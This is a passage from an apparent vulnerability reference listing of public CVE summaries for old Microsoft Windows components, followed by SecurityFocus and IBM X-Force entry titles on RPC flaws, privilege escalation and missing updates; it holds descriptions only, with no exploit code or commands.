(SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [102055] Microsoft Windows RPC CVE-2017-11885 Remote Code Execution Vulnerability [99012] Microsoft Windows RPC CVE-2017-8461 Remote Code Execution Vulnerability [72933] Microsoft Windows 'Netlogon' RPC CVE-2015-0005 Spoofing Vulnerability [43119] Microsoft Windows RPC Memory Allocation Remote Code Execution Vulnerability [34443] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation Vulnerability [31874] Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability [25974] Microsoft Windows RPC NTLMSSP Remote Denial Of Service Vulnerability [18389] Microsoft Windows RPC Mutual Authentication Service Spoofing Vulnerability [14178] Microsoft Windows MSRPC Eventlog Information Disclosure Vulnerability [14177] Microsoft Windows MSRPC SVCCTL Service Enumeration Vulnerability [10127] Microsoft Windows RPCSS Service Remote Denial Of Service Vulnerability [10123] Microsoft Windows COM Internet Service/RPC Over HTTP Remote Denial Of Service Vulnerability [8811] Microsoft Windows RPCSS Multi-thread Race Condition Vulnerability [8234] Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability [8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [8104] Microsoft Windows 2000 Unauthorized RPC Connection Weakness [6769] Microsoft Windows 2000 RPC Service Privilege Escalation Vulnerability [6005] Microsoft Windows RPC Service Denial of Service Vulnerability [3313] Microsoft Windows NT RPC Endpoint Mapper Denial of Service Vulnerability [2234] Microsoft Windows NT RPC DoS Vulnerability [1673] Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [61498] Microsoft Windows RPC code execution [52092] Microsoft Windows Workstation Service RPC message code execution [50797] Microsoft Windows RPC Marshalling Engine code execution [49581] Microsoft Windows RPCSS privilege escalation [46040] Microsoft Windows Server Service RPC code execution [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [33629] Microsoft Windows DNS Server RPC interface buffer overflow [26836] Microsoft Windows RPC mutual authentication spoofing [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [17646] Microsoft Windows RPC Runtime Library obtain information [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [13426] Microsoft Windows 2000 and XP RPC race condition [13129] Microsoft Windows RPCSS DCOM buffer overflows [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12679] Microsoft Windows RPC DCOM denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [5222] Microsoft Windows 2000 malformed RPC packet denial of service [1977] Microsoft Windows NT RPC services can be used to deplete system resources [17] Microsoft Windows NT RPC locator denial of service [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows 